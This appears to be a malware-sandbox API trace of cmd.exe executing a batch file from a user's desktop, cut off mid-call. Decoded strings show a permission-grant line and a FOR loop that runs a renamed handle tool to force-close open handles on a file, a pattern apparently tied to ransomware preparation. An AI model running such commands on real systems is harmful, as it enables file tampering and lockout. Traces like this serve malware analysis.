[0220.486] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x351248 | out: hHeap=0x350000) returned 1 [0220.486] GetProcessHeap () returned 0x350000 [0220.486] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3641a0 | out: hHeap=0x350000) returned 1 [0220.487] _get_osfhandle (_FileHandle=3) returned 0x78 [0220.487] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0220.487] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x34f6a8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x34f6a8*=0xa3, lpOverlapped=0x0) returned 1 [0220.487] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0220.487] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0220.488] _get_osfhandle (_FileHandle=3) returned 0x78 [0220.488] GetFileType (hFile=0x78) returned 0x1 [0220.488] _get_osfhandle (_FileHandle=3) returned 0x78 [0220.488] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0220.488] GetProcessHeap () returned 0x350000 [0220.488] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400a) returned 0x374bd0 [0220.489] GetProcessHeap () returned 0x350000 [0220.489] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x70) returned 0x351248 [0220.489] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x34ee38, lpFilePart=0x34ee30 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x34ee30*="Ch81ANBE.bat") returned 0x32 [0220.489] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x34eb4c | out: lpFindFileData=0x34eb4c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3641a0 [0220.489] FindClose (in: hFindFile=0x3641a0 | out: hFindFile=0x3641a0) returned 1 [0220.489] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x34eb4c | out: lpFindFileData=0x34eb4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3641a0 [0220.490] FindClose (in: hFindFile=0x3641a0 | out: hFindFile=0x3641a0) returned 1 [0220.490] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0220.490] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x34eb4c | out: lpFindFileData=0x34eb4c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3641a0 [0220.490] FindClose (in: hFindFile=0x3641a0 | out: hFindFile=0x3641a0) returned 1 [0220.490] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x34eb4c | out: lpFindFileData=0x34eb4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x3641a0 [0220.490] FindClose (in: hFindFile=0x3641a0 | out: hFindFile=0x3641a0) returned 1 [0220.490] GetProcessHeap () returned 0x350000 [0220.491] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x56) returned 0x3641a0 [0220.491] GetProcessHeap () returned 0x350000 [0220.491] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x374bd0 | out: hHeap=0x350000) returned 1 [0220.494] _tell (_FileHandle=3) returned 78 [0220.494] _close (_FileHandle=3) returned 0 [0220.494] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x34f47c | out: _Buffer="\r\n") returned 2 [0220.494] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.494] GetFileType (hFile=0x7) returned 0x2 [0220.494] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.494] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f43c | out: lpMode=0x34f43c) returned 1 [0220.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.495] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f468, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f468*=0x2) returned 1 [0220.497] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0220.497] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0220.497] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x34f478 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0220.497] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x34f478 | out: _Buffer=">") returned 1 [0220.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.497] GetFileType (hFile=0x7) returned 0x2 [0220.498] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.498] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f440 | out: lpMode=0x34f440) returned 1 [0221.128] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.128] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x34f46c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x34f46c*=0x26) returned 1 [0221.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.129] GetFileType (hFile=0x7) returned 0x2 [0221.129] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.129] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6c4 | out: lpMode=0x34f6c4) returned 1 [0221.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.129] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x350dc0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f6f0, lpReserved=0x0 | out: lpBuffer=0x350dc0*, lpNumberOfCharsWritten=0x34f6f0*=0x2) returned 1 [0221.130] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x34f6fc | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0221.130] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.130] GetFileType (hFile=0x7) returned 0x2 [0221.130] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.131] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6bc | out: lpMode=0x34f6bc) returned 1 [0221.131] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.131] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x34f6e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f6e8*=0x2d) returned 1 [0221.133] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x34f71c | out: _Buffer="\r\n") returned 2 [0221.133] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.133] GetFileType (hFile=0x7) returned 0x2 [0221.134] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.134] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6dc | out: lpMode=0x34f6dc) returned 1 [0221.134] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.134] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f708, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f708*=0x2) returned 1 [0221.136] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0221.136] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0221.136] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0221.136] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0221.136] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0221.136] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0221.137] GetConsoleTitleW (in: lpConsoleTitle=0x34f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.138] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x34f048, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x34f040, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x34f040*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0221.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x34ede4, lpFilePart=0x34ede0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x34ede0*=0x0) returned 0x26 [0221.139] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0221.139] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x34eb60 | out: lpFindFileData=0x34eb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3644e0 [0221.139] FindClose (in: hFindFile=0x3644e0 | out: hFindFile=0x3644e0) returned 1 [0221.139] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x34eb60 | out: lpFindFileData=0x34eb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3644e0 [0221.139] FindClose (in: hFindFile=0x3644e0 | out: hFindFile=0x3644e0) returned 1 [0221.139] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0221.139] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x34eb60 | out: lpFindFileData=0x34eb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3644e0 [0221.139] FindClose (in: hFindFile=0x3644e0 | out: hFindFile=0x3644e0) returned 1 [0221.140] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0221.140] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0221.140] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0221.140] GetProcessHeap () returned 0x350000 [0221.140] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3676f0 | out: hHeap=0x350000) returned 1 [0221.140] GetEnvironmentStringsW () returned 0x366b58* [0221.140] GetProcessHeap () returned 0x350000 [0221.140] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb8c) returned 0x3676f0 [0221.140] FreeEnvironmentStringsW (penv=0x366b58) returned 1 [0221.140] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0221.140] GetProcessHeap () returned 0x350000 [0221.140] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364480 | out: hHeap=0x350000) returned 1 [0221.140] GetProcessHeap () returned 0x350000 [0221.140] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364420 | out: hHeap=0x350000) returned 1 [0221.140] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.140] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0221.141] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.141] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0221.142] _get_osfhandle (_FileHandle=0) returned 0x3 [0221.142] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0221.142] SetConsoleInputExeNameW () returned 0x1 [0221.142] GetConsoleOutputCP () returned 0x1b5 [0221.143] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0221.143] SetThreadUILanguage (LangId=0x0) returned 0x409 [0221.143] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x34f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0221.144] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0221.144] _get_osfhandle (_FileHandle=3) returned 0x78 [0221.144] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0221.144] GetProcessHeap () returned 0x350000 [0221.144] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3643b0 | out: hHeap=0x350000) returned 1 [0221.145] GetProcessHeap () returned 0x350000 [0221.145] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364340 | out: hHeap=0x350000) returned 1 [0221.145] GetProcessHeap () returned 0x350000 [0221.145] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3642d0 | out: hHeap=0x350000) returned 1 [0221.145] GetProcessHeap () returned 0x350000 [0221.145] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364260 | out: hHeap=0x350000) returned 1 [0221.145] GetProcessHeap () returned 0x350000 [0221.145] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x350000) returned 1 [0221.145] GetProcessHeap () returned 0x350000 [0221.145] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364200 | out: hHeap=0x350000) returned 1 [0221.145] GetProcessHeap () returned 0x350000 [0221.145] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3641a0 | out: hHeap=0x350000) returned 1 [0221.145] GetProcessHeap () returned 0x350000 [0221.145] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x351248 | out: hHeap=0x350000) returned 1 [0221.145] _get_osfhandle (_FileHandle=3) returned 0x78 [0221.145] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0221.145] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x34f6a8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x34f6a8*=0x94, lpOverlapped=0x0) returned 1 [0221.146] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0221.146] _get_osfhandle (_FileHandle=3) returned 0x78 [0221.146] GetFileType (hFile=0x78) returned 0x1 [0221.146] _get_osfhandle (_FileHandle=3) returned 0x78 [0221.146] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0221.146] GetProcessHeap () returned 0x350000 [0221.146] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400a) returned 0x374bd0 [0221.147] GetProcessHeap () returned 0x350000 [0221.147] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x4008) returned 0x378be8 [0221.148] GetProcessHeap () returned 0x350000 [0221.148] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xe) returned 0x350db8 [0221.148] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"Month_Calendar.jtp\"") returned 0x14 [0221.148] GetProcessHeap () returned 0x350000 [0221.148] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x350000) returned 1 [0221.148] GetProcessHeap () returned 0x350000 [0221.148] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x378be8 | out: hHeap=0x350000) returned 1 [0221.148] GetProcessHeap () returned 0x350000 [0221.148] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x374bd0 | out: hHeap=0x350000) returned 1 [0221.158] _tell (_FileHandle=3) returned 226 [0221.158] _close (_FileHandle=3) returned 0 [0221.159] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x34f47c | out: _Buffer="\r\n") returned 2 [0221.159] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.159] GetFileType (hFile=0x7) returned 0x2 [0221.160] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.160] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f43c | out: lpMode=0x34f43c) returned 1 [0221.160] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.160] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f468, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f468*=0x2) returned 1 [0221.163] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0221.163] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0221.163] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x34f478 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0221.163] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x34f478 | out: _Buffer=">") returned 1 [0221.163] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.163] GetFileType (hFile=0x7) returned 0x2 [0221.164] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.164] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f440 | out: lpMode=0x34f440) returned 1 [0221.164] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.164] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x34f46c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x34f46c*=0x26) returned 1 [0221.165] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x34f6fc | out: _Buffer="FOR") returned 3 [0221.165] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.165] GetFileType (hFile=0x7) returned 0x2 [0221.165] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.165] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6bc | out: lpMode=0x34f6bc) returned 1 [0221.166] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.166] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x34f6e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f6e8*=0x3) returned 1 [0221.166] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x34f6fc | out: _Buffer=" /F") returned 3 [0221.166] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.166] GetFileType (hFile=0x7) returned 0x2 [0221.167] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.167] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6bc | out: lpMode=0x34f6bc) returned 1 [0221.167] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.167] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x34f6e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f6e8*=0x3) returned 1 [0221.167] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x34f6fc | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0221.167] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.167] GetFileType (hFile=0x7) returned 0x2 [0221.168] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.168] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6bc | out: lpMode=0x34f6bc) returned 1 [0221.168] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.168] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x34f6e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f6e8*=0x20) returned 1 [0221.169] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x34f6fc | out: _Buffer=" %I IN ") returned 7 [0221.169] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.169] GetFileType (hFile=0x7) returned 0x2 [0221.169] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.169] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6bc | out: lpMode=0x34f6bc) returned 1 [0221.170] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.170] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x34f6e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f6e8*=0x7) returned 1 [0221.172] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x34f6f8 | out: _Buffer="(`tdq963ii.exe -accepteula \"Month_Calendar.jtp\" -nobanner`) DO ") returned 63 [0221.172] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.172] GetFileType (hFile=0x7) returned 0x2 [0221.172] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.172] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6b8 | out: lpMode=0x34f6b8) returned 1 [0221.173] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.173] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3f, lpNumberOfCharsWritten=0x34f6e4, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f6e4*=0x3f) returned 1 [0221.173] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.173] GetFileType (hFile=0x7) returned 0x2 [0221.174] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6c4 | out: lpMode=0x34f6c4) returned 1 [0221.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.174] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x34f6f0, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x34f6f0*=0x1) returned 1 [0221.175] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.175] GetFileType (hFile=0x7) returned 0x2 [0221.175] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.175] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6a8 | out: lpMode=0x34f6a8) returned 1 [0221.175] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.175] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x35f4f8*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x34f6d4, lpReserved=0x0 | out: lpBuffer=0x35f4f8*, lpNumberOfCharsWritten=0x34f6d4*=0xc) returned 1 [0221.176] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x34f6e0 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0221.176] _get_osfhandle (_FileHandle=1) 